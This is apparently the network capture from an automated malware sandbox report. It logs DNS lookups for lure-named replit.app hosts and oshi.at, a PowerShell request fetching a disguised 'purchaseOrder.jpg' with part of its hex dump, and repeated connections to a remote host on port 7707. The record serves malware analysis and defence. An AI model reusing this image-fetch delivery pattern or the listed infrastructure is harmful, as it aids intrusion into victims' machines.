                                      Jul 30, 2024 11:11:32.159476042 CEST443497095.253.86.15192.168.2.8
                                      Jul 30, 2024 11:11:32.159548044 CEST49709443192.168.2.85.253.86.15
                                      Jul 30, 2024 11:11:32.159605026 CEST443497095.253.86.15192.168.2.8
                                      Jul 30, 2024 11:11:32.159653902 CEST49709443192.168.2.85.253.86.15
                                      Jul 30, 2024 11:11:32.160429001 CEST443497095.253.86.15192.168.2.8
                                      Jul 30, 2024 11:11:32.160501957 CEST49709443192.168.2.85.253.86.15
                                      Jul 30, 2024 11:11:32.161251068 CEST443497095.253.86.15192.168.2.8
                                      Jul 30, 2024 11:11:32.161309958 CEST49709443192.168.2.85.253.86.15
                                      Jul 30, 2024 11:11:32.161392927 CEST443497095.253.86.15192.168.2.8
                                      Jul 30, 2024 11:11:32.161443949 CEST49709443192.168.2.85.253.86.15
                                      Jul 30, 2024 11:11:32.162554026 CEST443497095.253.86.15192.168.2.8
                                      Jul 30, 2024 11:11:32.162607908 CEST49709443192.168.2.85.253.86.15
                                      Jul 30, 2024 11:11:32.162822962 CEST443497095.253.86.15192.168.2.8
                                      Jul 30, 2024 11:11:32.162873983 CEST49709443192.168.2.85.253.86.15
                                      Jul 30, 2024 11:11:32.247344971 CEST443497095.253.86.15192.168.2.8
                                      Jul 30, 2024 11:11:32.247446060 CEST49709443192.168.2.85.253.86.15
                                      Jul 30, 2024 11:11:32.248033047 CEST443497095.253.86.15192.168.2.8
                                      Jul 30, 2024 11:11:32.248100996 CEST443497095.253.86.15192.168.2.8
                                      Jul 30, 2024 11:11:32.248104095 CEST49709443192.168.2.85.253.86.15
                                      Jul 30, 2024 11:11:32.248121023 CEST443497095.253.86.15192.168.2.8
                                      Jul 30, 2024 11:11:32.248137951 CEST49709443192.168.2.85.253.86.15
                                      Jul 30, 2024 11:11:32.248888969 CEST443497095.253.86.15192.168.2.8
                                      Jul 30, 2024 11:11:32.248944044 CEST49709443192.168.2.85.253.86.15
                                      Jul 30, 2024 11:11:32.248950958 CEST443497095.253.86.15192.168.2.8
                                      Jul 30, 2024 11:11:32.248996973 CEST49709443192.168.2.85.253.86.15
                                      Jul 30, 2024 11:11:32.249015093 CEST443497095.253.86.15192.168.2.8
                                      Jul 30, 2024 11:11:32.249063015 CEST49709443192.168.2.85.253.86.15
                                      Jul 30, 2024 11:11:32.249063969 CEST443497095.253.86.15192.168.2.8
                                      Jul 30, 2024 11:11:32.249074936 CEST443497095.253.86.15192.168.2.8
                                      Jul 30, 2024 11:11:32.249106884 CEST49709443192.168.2.85.253.86.15
                                      Jul 30, 2024 11:11:32.250834942 CEST443497095.253.86.15192.168.2.8
                                      Jul 30, 2024 11:11:32.250897884 CEST49709443192.168.2.85.253.86.15
                                      Jul 30, 2024 11:11:32.250947952 CEST443497095.253.86.15192.168.2.8
                                      Jul 30, 2024 11:11:32.250987053 CEST49709443192.168.2.85.253.86.15
                                      Jul 30, 2024 11:11:32.251123905 CEST443497095.253.86.15192.168.2.8
                                      Jul 30, 2024 11:11:32.251195908 CEST443497095.253.86.15192.168.2.8
                                      Jul 30, 2024 11:11:32.251214981 CEST49709443192.168.2.85.253.86.15
                                      Jul 30, 2024 11:11:32.251238108 CEST49709443192.168.2.85.253.86.15
                                      Jul 30, 2024 11:11:32.259135962 CEST49709443192.168.2.85.253.86.15
                                      Jul 30, 2024 11:11:44.223742962 CEST497177707192.168.2.8192.228.105.2
                                      Jul 30, 2024 11:11:44.229677916 CEST770749717192.228.105.2192.168.2.8
                                      Jul 30, 2024 11:11:44.229751110 CEST497177707192.168.2.8192.228.105.2
                                      Jul 30, 2024 11:11:44.238604069 CEST497177707192.168.2.8192.228.105.2
                                      Jul 30, 2024 11:11:44.243422031 CEST770749717192.228.105.2192.168.2.8
                                      Jul 30, 2024 11:11:44.808835030 CEST770749717192.228.105.2192.168.2.8
                                      Jul 30, 2024 11:11:44.808851004 CEST770749717192.228.105.2192.168.2.8
                                      Jul 30, 2024 11:11:44.808921099 CEST497177707192.168.2.8192.228.105.2
                                      Jul 30, 2024 11:11:44.815963030 CEST497177707192.168.2.8192.228.105.2
                                      Jul 30, 2024 11:11:44.820858955 CEST770749717192.228.105.2192.168.2.8
                                      Jul 30, 2024 11:11:44.972887039 CEST770749717192.228.105.2192.168.2.8
                                      Jul 30, 2024 11:11:45.015654087 CEST497177707192.168.2.8192.228.105.2
                                      Jul 30, 2024 11:11:45.220768929 CEST497177707192.168.2.8192.228.105.2
                                      Jul 30, 2024 11:11:45.226223946 CEST770749717192.228.105.2192.168.2.8
                                      Jul 30, 2024 11:11:45.226284027 CEST497177707192.168.2.8192.228.105.2
                                      Jul 30, 2024 11:11:45.231499910 CEST770749717192.228.105.2192.168.2.8
                                      Jul 30, 2024 11:11:54.651990891 CEST770749717192.228.105.2192.168.2.8
                                      Jul 30, 2024 11:11:54.703180075 CEST497177707192.168.2.8192.228.105.2
                                      Jul 30, 2024 11:11:54.764708996 CEST770749717192.228.105.2192.168.2.8
                                      Jul 30, 2024 11:11:54.812524080 CEST497177707192.168.2.8192.228.105.2
                                      Jul 30, 2024 11:11:56.704308987 CEST497177707192.168.2.8192.228.105.2
                                      Jul 30, 2024 11:11:56.722745895 CEST770749717192.228.105.2192.168.2.8
                                      Jul 30, 2024 11:11:56.722817898 CEST497177707192.168.2.8192.228.105.2
                                      Jul 30, 2024 11:11:56.742476940 CEST770749717192.228.105.2192.168.2.8
                                      Jul 30, 2024 11:11:57.023108006 CEST770749717192.228.105.2192.168.2.8
                                      Jul 30, 2024 11:11:57.078142881 CEST497177707192.168.2.8192.228.105.2
                                      Jul 30, 2024 11:11:57.092848063 CEST770749717192.228.105.2192.168.2.8
                                      Jul 30, 2024 11:11:57.111027002 CEST497177707192.168.2.8192.228.105.2
                                      Jul 30, 2024 11:11:57.116539955 CEST770749717192.228.105.2192.168.2.8
                                      Jul 30, 2024 11:11:57.116612911 CEST497177707192.168.2.8192.228.105.2
                                      Jul 30, 2024 11:11:57.121889114 CEST770749717192.228.105.2192.168.2.8
                                      Jul 30, 2024 11:12:08.189923048 CEST497177707192.168.2.8192.228.105.2
                                      Jul 30, 2024 11:12:08.194906950 CEST770749717192.228.105.2192.168.2.8
                                      Jul 30, 2024 11:12:08.194967031 CEST497177707192.168.2.8192.228.105.2
                                      Jul 30, 2024 11:12:08.202502966 CEST770749717192.228.105.2192.168.2.8
                                      Jul 30, 2024 11:12:08.454628944 CEST770749717192.228.105.2192.168.2.8
                                      Jul 30, 2024 11:12:08.500053883 CEST497177707192.168.2.8192.228.105.2
                                      Jul 30, 2024 11:12:09.027610064 CEST770749717192.228.105.2192.168.2.8
                                      Jul 30, 2024 11:12:09.028213024 CEST770749717192.228.105.2192.168.2.8
                                      Jul 30, 2024 11:12:09.028307915 CEST497177707192.168.2.8192.228.105.2
                                      Jul 30, 2024 11:12:09.029654026 CEST770749717192.228.105.2192.168.2.8
                                      Jul 30, 2024 11:12:09.029673100 CEST497177707192.168.2.8192.228.105.2
                                      Jul 30, 2024 11:12:09.029700994 CEST497177707192.168.2.8192.228.105.2
                                      Jul 30, 2024 11:12:09.036725044 CEST770749717192.228.105.2192.168.2.8
                                      Jul 30, 2024 11:12:09.036791086 CEST497177707192.168.2.8192.228.105.2
                                      Jul 30, 2024 11:12:09.044610023 CEST770749717192.228.105.2192.168.2.8
                                      Jul 30, 2024 11:12:19.672590017 CEST497177707192.168.2.8192.228.105.2
                                      Jul 30, 2024 11:12:19.680803061 CEST770749717192.228.105.2192.168.2.8
                                      Jul 30, 2024 11:12:19.680887938 CEST497177707192.168.2.8192.228.105.2
                                      Jul 30, 2024 11:12:19.686012983 CEST770749717192.228.105.2192.168.2.8
                                      Jul 30, 2024 11:12:19.938575983 CEST770749717192.228.105.2192.168.2.8
                                      Jul 30, 2024 11:12:19.984601021 CEST497177707192.168.2.8192.228.105.2
                                      Jul 30, 2024 11:12:20.046248913 CEST770749717192.228.105.2192.168.2.8
                                      Jul 30, 2024 11:12:20.048846006 CEST497177707192.168.2.8192.228.105.2
                                      Jul 30, 2024 11:12:20.053695917 CEST770749717192.228.105.2192.168.2.8
                                      Jul 30, 2024 11:12:20.053811073 CEST497177707192.168.2.8192.228.105.2
                                      Jul 30, 2024 11:12:20.059189081 CEST770749717192.228.105.2192.168.2.8
                                      Jul 30, 2024 11:12:24.673249006 CEST770749717192.228.105.2192.168.2.8
                                      Jul 30, 2024 11:12:24.718867064 CEST497177707192.168.2.8192.228.105.2
                                      Jul 30, 2024 11:12:24.778104067 CEST770749717192.228.105.2192.168.2.8
                                      Jul 30, 2024 11:12:24.828227997 CEST497177707192.168.2.8192.228.105.2
                                      Jul 30, 2024 11:12:31.157092094 CEST497177707192.168.2.8192.228.105.2
                                      Jul 30, 2024 11:12:31.162374020 CEST770749717192.228.105.2192.168.2.8
                                      Jul 30, 2024 11:12:31.162487984 CEST497177707192.168.2.8192.228.105.2
                                      Jul 30, 2024 11:12:31.167522907 CEST770749717192.228.105.2192.168.2.8
                                      Jul 30, 2024 11:12:31.324799061 CEST770749717192.228.105.2192.168.2.8
                                      Jul 30, 2024 11:12:31.375144005 CEST497177707192.168.2.8192.228.105.2
                                      Jul 30, 2024 11:12:31.437681913 CEST770749717192.228.105.2192.168.2.8
                                      Jul 30, 2024 11:12:31.439268112 CEST497177707192.168.2.8192.228.105.2
                                      Jul 30, 2024 11:12:31.444228888 CEST770749717192.228.105.2192.168.2.8
                                      Jul 30, 2024 11:12:31.444314957 CEST497177707192.168.2.8192.228.105.2
                                      Jul 30, 2024 11:12:31.449194908 CEST770749717192.228.105.2192.168.2.8
                                      Jul 30, 2024 11:12:42.641479015 CEST497177707192.168.2.8192.228.105.2
                                      Jul 30, 2024 11:12:42.650890112 CEST770749717192.228.105.2192.168.2.8
                                      Jul 30, 2024 11:12:42.651041985 CEST497177707192.168.2.8192.228.105.2
                                      Jul 30, 2024 11:12:42.658133030 CEST770749717192.228.105.2192.168.2.8
                                      Jul 30, 2024 11:12:42.930648088 CEST770749717192.228.105.2192.168.2.8
                                      Jul 30, 2024 11:12:42.984419107 CEST497177707192.168.2.8192.228.105.2
                                      Jul 30, 2024 11:12:43.033548117 CEST770749717192.228.105.2192.168.2.8
                                      Jul 30, 2024 11:12:43.035507917 CEST497177707192.168.2.8192.228.105.2
                                      Jul 30, 2024 11:12:43.040596008 CEST770749717192.228.105.2192.168.2.8
                                      Jul 30, 2024 11:12:43.040661097 CEST497177707192.168.2.8192.228.105.2
                                      Jul 30, 2024 11:12:43.045546055 CEST770749717192.228.105.2192.168.2.8
                                      Jul 30, 2024 11:12:54.125540972 CEST497177707192.168.2.8192.228.105.2
                                      Jul 30, 2024 11:12:54.437536955 CEST497177707192.168.2.8192.228.105.2
                                      Jul 30, 2024 11:12:54.825829029 CEST770749717192.228.105.2192.168.2.8
                                      Jul 30, 2024 11:12:54.826283932 CEST770749717192.228.105.2192.168.2.8
                                      Jul 30, 2024 11:12:54.826375961 CEST497177707192.168.2.8192.228.105.2
                                      Jul 30, 2024 11:12:54.829951048 CEST770749717192.228.105.2192.168.2.8
                                      Jul 30, 2024 11:12:54.830040932 CEST770749717192.228.105.2192.168.2.8
                                      Jul 30, 2024 11:12:54.994143963 CEST770749717192.228.105.2192.168.2.8
                                      Jul 30, 2024 11:12:55.047184944 CEST497177707192.168.2.8192.228.105.2
                                      Jul 30, 2024 11:12:55.109586954 CEST770749717192.228.105.2192.168.2.8
                                      Jul 30, 2024 11:12:55.111509085 CEST497177707192.168.2.8192.228.105.2
                                      Jul 30, 2024 11:12:55.116559982 CEST770749717192.228.105.2192.168.2.8
                                      Jul 30, 2024 11:12:55.116638899 CEST497177707192.168.2.8192.228.105.2
                                      Jul 30, 2024 11:12:55.122734070 CEST770749717192.228.105.2192.168.2.8
                                      Jul 30, 2024 11:13:05.609986067 CEST497177707192.168.2.8192.228.105.2
                                      Jul 30, 2024 11:13:05.615848064 CEST770749717192.228.105.2192.168.2.8
                                      Jul 30, 2024 11:13:05.615916967 CEST497177707192.168.2.8192.228.105.2
                                      Jul 30, 2024 11:13:05.621579885 CEST770749717192.228.105.2192.168.2.8
                                      Jul 30, 2024 11:13:05.880100012 CEST770749717192.228.105.2192.168.2.8
                                      Jul 30, 2024 11:13:05.921988964 CEST497177707192.168.2.8192.228.105.2
                                      Jul 30, 2024 11:13:06.005609035 CEST770749717192.228.105.2192.168.2.8
                                      Jul 30, 2024 11:13:06.007563114 CEST497177707192.168.2.8192.228.105.2
                                      Jul 30, 2024 11:13:06.014045000 CEST770749717192.228.105.2192.168.2.8
                                      Jul 30, 2024 11:13:06.014117002 CEST497177707192.168.2.8192.228.105.2
                                      Jul 30, 2024 11:13:06.021023989 CEST770749717192.228.105.2192.168.2.8
                                      Jul 30, 2024 11:13:17.094285965 CEST497177707192.168.2.8192.228.105.2
                                      Jul 30, 2024 11:13:17.099176884 CEST770749717192.228.105.2192.168.2.8
                                      Jul 30, 2024 11:13:17.099256992 CEST497177707192.168.2.8192.228.105.2
                                      Jul 30, 2024 11:13:17.104661942 CEST770749717192.228.105.2192.168.2.8
                                      Jul 30, 2024 11:13:17.357151031 CEST770749717192.228.105.2192.168.2.8
                                      Jul 30, 2024 11:13:17.406325102 CEST497177707192.168.2.8192.228.105.2
                                      Jul 30, 2024 11:13:17.493865967 CEST770749717192.228.105.2192.168.2.8
                                      Jul 30, 2024 11:13:17.495836973 CEST497177707192.168.2.8192.228.105.2
                                      Jul 30, 2024 11:13:17.501544952 CEST770749717192.228.105.2192.168.2.8
                                      Jul 30, 2024 11:13:17.501611948 CEST497177707192.168.2.8192.228.105.2
                                      Jul 30, 2024 11:13:17.506808996 CEST770749717192.228.105.2192.168.2.8
                                      Jul 30, 2024 11:13:24.679615021 CEST770749717192.228.105.2192.168.2.8
                                      Jul 30, 2024 11:13:24.734386921 CEST497177707192.168.2.8192.228.105.2
                                      Jul 30, 2024 11:13:24.813374996 CEST770749717192.228.105.2192.168.2.8
                                      Jul 30, 2024 11:13:24.859431028 CEST497177707192.168.2.8192.228.105.2
                                      Jul 30, 2024 11:13:28.359844923 CEST497177707192.168.2.8192.228.105.2
                                      Jul 30, 2024 11:13:28.365175009 CEST770749717192.228.105.2192.168.2.8
                                      Jul 30, 2024 11:13:28.365288019 CEST497177707192.168.2.8192.228.105.2
                                      Jul 30, 2024 11:13:28.370242119 CEST770749717192.228.105.2192.168.2.8
                                      Jul 30, 2024 11:13:28.627541065 CEST770749717192.228.105.2192.168.2.8
                                      Jul 30, 2024 11:13:28.671967983 CEST497177707192.168.2.8192.228.105.2
                                      Jul 30, 2024 11:13:28.735920906 CEST770749717192.228.105.2192.168.2.8
                                      Jul 30, 2024 11:13:28.736690044 CEST497177707192.168.2.8192.228.105.2
                                      Jul 30, 2024 11:13:28.741863966 CEST770749717192.228.105.2192.168.2.8
                                      Jul 30, 2024 11:13:28.741950989 CEST497177707192.168.2.8192.228.105.2
                                      Jul 30, 2024 11:13:28.749731064 CEST770749717192.228.105.2192.168.2.8
                                      TimestampSource PortDest PortSource IPDest IP
                                      Jul 30, 2024 11:11:24.022327900 CEST5993153192.168.2.81.1.1.1
                                      Jul 30, 2024 11:11:24.047322989 CEST53599311.1.1.1192.168.2.8
                                      Jul 30, 2024 11:11:26.924992085 CEST5682953192.168.2.81.1.1.1
                                      Jul 30, 2024 11:11:26.947962999 CEST53568291.1.1.1192.168.2.8
                                      Jul 30, 2024 11:11:30.752475977 CEST5697053192.168.2.81.1.1.1
                                      Jul 30, 2024 11:11:30.764626026 CEST53569701.1.1.1192.168.2.8
                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                      Jul 30, 2024 11:11:24.022327900 CEST192.168.2.81.1.1.10xaac9Standard query (0)jdvdpconstructionltdfileportal.replit.appA (IP address)IN (0x0001)false
                                      Jul 30, 2024 11:11:26.924992085 CEST192.168.2.81.1.1.10x6aa1Standard query (0)secured-order-download-businessportal.replit.appA (IP address)IN (0x0001)false
                                      Jul 30, 2024 11:11:30.752475977 CEST192.168.2.81.1.1.10x9436Standard query (0)oshi.atA (IP address)IN (0x0001)false
                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                      Jul 30, 2024 11:11:24.047322989 CEST1.1.1.1192.168.2.80xaac9No error (0)jdvdpconstructionltdfileportal.replit.app34.117.33.233A (IP address)IN (0x0001)false
                                      Jul 30, 2024 11:11:26.947962999 CEST1.1.1.1192.168.2.80x6aa1No error (0)secured-order-download-businessportal.replit.app34.117.33.233A (IP address)IN (0x0001)false
                                      Jul 30, 2024 11:11:30.764626026 CEST1.1.1.1192.168.2.80x9436No error (0)oshi.at5.253.86.15A (IP address)IN (0x0001)false
                                      Jul 30, 2024 11:11:30.764626026 CEST1.1.1.1192.168.2.80x9436No error (0)oshi.at194.15.112.248A (IP address)IN (0x0001)false
                                      Jul 30, 2024 11:11:30.764626026 CEST1.1.1.1192.168.2.80x9436No error (0)oshi.at188.241.120.6A (IP address)IN (0x0001)false
                                      • jdvdpconstructionltdfileportal.replit.app
                                      • secured-order-download-businessportal.replit.app
                                      • oshi.at
                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      0192.168.2.84970734.117.33.2334431608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      TimestampBytes transferredDirectionData
                                      2024-07-30 09:11:24 UTC203OUTGET /purchaseOrder.jpg HTTP/1.1
                                      User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                      Host: jdvdpconstructionltdfileportal.replit.app
                                      Connection: Keep-Alive
                                      2024-07-30 09:11:24 UTC263INHTTP/1.1 200 OK
                                      Content-Length: 187448
                                      Content-Type: image/jpeg
                                      Strict-Transport-Security: max-age=63072000; includeSubDomains
                                      Date: Tue, 30 Jul 2024 09:11:24 GMT
                                      Via: 1.1 google
                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                      Connection: close
                                      2024-07-30 09:11:24 UTC1390INData Raw: ff d8 ff e1 00 8b 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 06 01 0f 00 02 00 00 00 08 00 00 00 56 01 12 00 03 00 00 00 01 00 01 00 00 01 1a 00 05 00 00 00 01 00 00 00 5e 01 1b 00 05 00 00 00 01 00 00 00 66 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 15 00 00 00 6e 00 00 00 00 42 65 46 75 6e 6b 79 00 00 00 01 2c 00 00 00 01 00 00 01 2c 00 00 00 01 42 65 46 75 6e 6b 79 20 50 68 6f 74 6f 20 45 64 69 74 6f 72 00 ff e0 00 10 4a 46 49 46 00 01 01 01 01 2c 01 2c 00 00 ff e2 01 d8 49 43 43 5f 50 52 4f 46 49 4c 45 00 01 01 00 00 01 c8 00 00 00 00 04 30 00 00 6d 6e 74 72 52 47 42 20 58 59 5a 20 07 e0 00 01 00 01 00 00 00 00 00 00 61 63 73 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 f6 d6 00 01 00 00
                                      Data Ascii: ExifMM*V^f(1nBeFunky,,BeFunky Photo EditorJFIF,,ICC_PROFILE0mntrRGB XYZ acsp
                                      2024-07-30 09:11:24 UTC1390INData Raw: db a9 cd f5 3e 1b b7 56 c5 d2 46 03 ff 00 32 a3 fe 2b 56 66 d3 8a b0 9d ea 41 1d 05 65 2c cf 3d 41 92 35 c5 0e 78 66 79 7d 49 28 42 b4 5b 7c ae 8d 13 9b ea 7c 37 6e a7 37 d4 f8 6e dd 53 58 a0 a5 70 04 31 a4 1d a0 86 af bc df 4d e1 b7 75 0e e2 13 e6 fa 9f 0d db a9 cd f5 3e 1b b7 54 d9 cd f4 de 1b 77 53 9b e9 bc 36 ee a0 21 3e 6f a9 f0 dd ba 9c df 53 e1 bb 75 4d 9c df 4d e1 b7 75 39 be 9b c3 6e ea 02 13 e6 fa 9f 0d db a9 cd f5 3e 1b b7 54 d9 cd f4 de 1b 77 53 9b e9 bc 36 ee a0 21 3e 6f a9 f0 dd ba 9c df 53 e1 bb 75 4d 9c df 4d e1 b7 75 39 be 97 b8 cf 44 04 27 cd f5 3e 1b b7 53 9b ea 7c 37 6e a9 b3 9b e9 bc 36 ee a7 37 d3 78 6d dd 40 42 7c df 53 e1 bb 75 39 be a7 c3 76 ea 9b 39 be 9b c3 6e ea 73 7d 37 86 dd d4 04 27 cd f5 3e 1b b7 53 9b ea 7c 37 6e a9 b3 9b
                                      Data Ascii: >VF2+VfAe,=A5xfy}I(B[||7n7nSXp1Mu>TwS6!>oSuMMu9n>TwS6!>oSuMMu9D'>S|7n67xm@B|Su9v9ns}7'>S|7n
                                      2024-07-30 09:11:24 UTC1146INData Raw: f4 95 f2 3b e5 ba 9d af 39 9c ba c2 81 ed bc 2c a8 24 74 94 f2 c9 f8 d2 75 58 35 ba ca ca e9 9f 0e dc af b8 36 db 4d 43 1c 8e 74 94 cc 6f c8 04 9e a5 50 59 a0 2b f5 b5 b4 f7 aa 88 a6 d5 63 c4 8f 66 a9 ea cf 35 b9 ff 00 4d f0 b2 72 c3 53 93 e2 d2 ff 00 62 ef 61 fd 3f 3e aa e1 0b 2a d8 e8 e0 99 c0 35 ee 39 34 e6 a6 db fe 91 68 ad b6 88 ee 8c 91 ae 8d cc d7 39 38 1d 9d 6b cf f9 e8 aa 6e 90 d0 50 5b 68 a4 8e aa 07 35 ae 73 58 43 b6 6c 53 d3 30 36 23 ab c2 0f a5 ad 32 93 c9 f2 01 d9 ec d8 86 e6 62 af 84 b5 ae 39 5b 1c 72 82 43 b2 7e 47 2c bf ad ab 71 66 9d ac cf b7 45 52 da 98 f8 c9 18 0e ae b0 d6 cc aa 2a ed 10 de db 25 73 8c 73 17 17 b8 b0 96 9d 9b 73 5d 7a 8d 1a e2 fb 7d 0b 6a 8f 2a 31 44 43 c3 32 3d 41 01 73 ab f4 ee 69 2a 20 7b b3 14 ef 23 e5 67 b0 8d 9f
                                      Data Ascii: ;9,$tuX56MCtoPY+cf5MrSba?>*594h98knP[h5sXClS06#2b9[rC~G,qfER*%sss]z}j*1DC2=Asi* {#g
                                      2024-07-30 09:11:24 UTC1390INData Raw: 08 0d 32 a2 08 ea 62 74 52 b4 39 ae 19 10 76 85 1e c9 a3 4b 04 b5 32 54 be 8e 12 f9 33 2e f9 03 33 9a 9c 39 82 5e c6 a7 30 4b d8 d5 c9 89 c0 e1 31 8d 3c 4d 35 2b 70 ba 3d 1c 06 6f 99 65 8a 4b 01 5a 50 d5 c6 ce d7 21 db 46 02 b3 5a 2a b9 4d 3d 34 4d 79 39 e6 1a 01 0b 75 92 18 e4 8c c4 f6 82 c2 dd 5c 96 db cc 12 f6 35 39 82 5e c6 ab e1 b0 98 6c 1c 3a bc 34 14 63 dc 8c f1 d9 8e 3b 32 aa ab 63 aa b9 c9 2b 5d bb 91 d0 c3 d6 e0 1e 38 86 0d 7d ae f9 39 e6 b0 55 7a 3f b0 d5 e6 5f 4b 10 71 39 92 18 14 c5 cc 12 f6 35 39 82 5e c6 ae 83 88 88 a9 b0 25 8e 99 81 ac a5 8b 66 dc f5 02 ec 3f 06 d9 9e 08 75 34 64 1e bf 92 14 ab cc 12 f6 35 39 82 5e c6 a0 21 91 a3 bb 03 6a 05 43 29 61 6b da 73 04 30 02 b7 5a 5a 68 e9 22 6c 31 00 1a d1 90 00 64 16 e3 cc 12 f6 35 39 82 5e c6
                                      Data Ascii: 2btR9vK2T3.39^0K1<M5+p=oeKZP!FZ*M=4My9u\59^l:4c;2c+]8}9Uz?_Kq959^%f?u4d59^!jC)aks0ZZh"l1d59^
                                      2024-07-30 09:11:24 UTC1390INData Raw: 84 06 db 90 ec 1e 89 90 ec 1e 8b 14 6f 96 b6 e5 9d 64 43 3e af 94 17 61 97 2a 29 06 6c a8 8d c3 af 63 82 03 bb 90 ec 1e 89 90 ec 1e 8b f3 1c ac 94 66 c7 07 0f a0 af 93 38 b5 84 84 07 ef 21 d8 3d 13 21 d8 3d 17 4a 96 57 48 4e 7d a5 7e eb aa 45 25 2c d5 07 aa 36 17 7c 10 1d 9f 91 ff 00 6f c1 7d c9 bd 83 d1 52 cc 5b a7 ba ab 35 fd f4 6c 07 8a 8e 5d 57 7c af 70 5b 75 ab 84 6d 86 4a 68 cd 4d 44 6d 93 2c 9c 1c ed a0 a0 2d 2e 43 b0 7a 26 4d ec 1e 8b 44 c2 38 ee d9 8b 22 12 51 4b 1b f3 cb e6 bb 32 b6 cb a5 41 a5 a1 a8 9c 75 b1 84 8f 44 07 61 f5 54 d1 1c 9f 34 6c 3d 85 d9 23 2a e9 a4 39 32 68 dc 4f 50 0e da a8 46 33 d2 8e 20 37 f9 e8 e8 e5 7b 58 c9 0b 46 a9 20 0d ab ed af 48 18 ba 92 46 55 c8 e9 64 a7 69 05 dd 67 62 02 ff 00 03 ef 07 fd c2 fb 99 ed 3e aa 30 c0 18
                                      Data Ascii: odC>a*)lcf8!=!=JWHN}~E%,6|o}R[5l]W|p[umJhMDm,-.Cz&MD8"QK2AuDaT4l=#*92hOPF3 7{XF HFUdigb>0
                                      2024-07-30 09:11:24 UTC1316INData Raw: b4 3d a4 16 b8 66 08 40 7e 91 11 00 44 5d 5a da b8 e8 a9 e4 a8 94 86 b2 36 97 12 7a 82 03 b4 8a 1e 8b 4b 96 69 ae 8e b6 c5 34 6e 90 48 58 40 23 3e b5 23 43 88 2d 92 32 32 ea 98 9a e7 b4 10 35 82 03 36 8b 16 fb d5 b1 84 07 55 c4 33 19 8f 94 17 0b b1 0d a1 a7 23 59 10 3f b4 3e f4 06 69 16 26 2b dd ae 63 94 75 71 13 fb 41 72 d4 5d 29 20 81 f3 ba 66 6a b1 ba c4 e7 b1 01 91 45 1a db f4 8d 69 ac b8 49 44 2a 23 cd 8e d5 3f 28 6c 5b ab 2f 56 c9 01 2d ab 8b 67 5f ca 1b 10 19 54 5d 28 2e 34 75 2e d5 82 76 48 7f ed 39 ae ea 00 88 88 02 22 d3 b1 5e 30 a0 c2 d4 ce 9e b2 46 b0 01 9f ca 39 20 37 14 50 75 a3 4d 76 1b 8d 40 87 8f 8d a1 ce c8 38 9c 87 aa 95 63 c4 56 99 22 6c c2 aa 20 d7 0c c7 cb 08 0c e2 28 fe a3 48 b8 7e 0a e6 d0 9a c8 78 c7 9c 83 75 c6 6b 69 8e f9 6c 90
                                      Data Ascii: =f@~D]Z6zKi4nHX@#>#C-2256U3#Y?>i&+cuqAr]) fjEiID*#?(l[/V-g_T](.4u.vH9"^0F9 7PuMv@8cV"l (H~xukil
                                      2024-07-30 09:11:24 UTC1390INData Raw: c9 a2 7b 9e 21 af 15 54 61 ce 05 f9 96 f5 ff 00 5d 6b 7a d1 0e 8d 23 b1 d0 b3 9c a9 5a 66 68 f9 cf 60 25 01 d8 d0 d6 10 ad b4 53 9a ba b6 b9 8f 94 eb ea b8 11 f4 a9 bb 10 17 36 d3 58 5b 9e 62 22 76 7d 45 65 21 82 28 18 19 13 03 1a 06 40 01 92 e3 ab a7 6d 55 3c b4 ee f9 b2 30 b4 a0 3c 8b c7 58 82 dc 31 dc f4 97 16 f1 a4 d4 96 b5 af 19 8e b5 9b bb be c5 4d 68 7d 4c 94 11 b6 21 16 b3 5d a8 06 5b 14 bd a5 7e 0f 55 37 0c 46 2f b6 e8 dc e7 71 bc 61 00 6d eb 5a bd cf 45 98 9a e9 6c 6d ad d4 6e 6b 4b 78 b2 e0 d3 b3 dc 80 fc 70 6f bd c3 5f 7f 7c 74 59 b6 06 bf 20 06 c6 f5 af 44 ef 8e 70 b2 d4 b9 b9 eb 0a 7c f3 1f b2 ab 1e 81 f4 24 30 43 4d 5d 4b 48 99 e7 5c e6 15 af aa a6 6d 4d 34 94 ce f9 af 66 a7 c3 24 07 91 d8 e6 fd 6c 18 e2 ae 9a e6 38 df ef 04 06 bc 66 3a d6
                                      Data Ascii: {!Ta]kz#Zfh`%S6X[b"v}Ee!(@mU<0<X1Mh}L!][~U7F/qamZElmnkKxpo_|tY Dp|$0CM]KH\mM4f$l8f:
                                      2024-07-30 09:11:24 UTC1390INData Raw: 60 d6 a7 20 8c 86 79 20 25 3d 1a 09 1b 85 ed fc 6b cb df c9 db 9b 8f 5f 52 90 96 bd 86 ad 4e b3 db 61 a3 27 3e 2d 81 83 fd 96 c2 80 22 22 03 af 56 48 a6 9c 8e b1 11 cb d1 79 55 a7 2e 78 ae c6 af a5 a4 13 38 19 08 1a a0 fb ca f5 6a 46 09 18 f6 1e a7 37 54 a8 6a e1 a2 9b 65 c2 fa 6e 93 c0 c7 bb 5f 5b 6b 73 40 79 77 70 c4 d8 9f 47 f4 46 4e 3a a2 27 96 eb 35 a4 90 b8 b0 d7 08 ec 53 74 d6 b7 cb 3c e0 92 5b ae 49 19 f5 fb d5 ff 00 d2 5f 07 da 1c 58 1a 22 8c 34 65 aa 43 5b 90 55 b7 10 f0 69 87 09 50 4d 51 49 4e e7 54 64 75 4b 1b b7 34 04 1d 73 d3 ee 2a c3 f5 6f 8d b5 93 4d ae 33 00 38 bb de a4 fd 0f 69 93 18 62 2c 43 4f c6 be a1 d1 3e 41 98 39 e4 01 ff 00 fa b0 38 17 83 dd d3 13 de 65 92 ed 4f 21 84 1d 9c 63 4f 6f d2 ae 7e 8f 74 03 47 84 ab e3 9d 90 80 d6 64 47
                                      Data Ascii: ` y %=k_RNa'>-""VHyU.x8jF7Tjen_[ks@ywpGFN:'5St<[I_X"4eC[UiPMQINTduK4s*oM38ib,CO>A98eO!cOo~tGdG
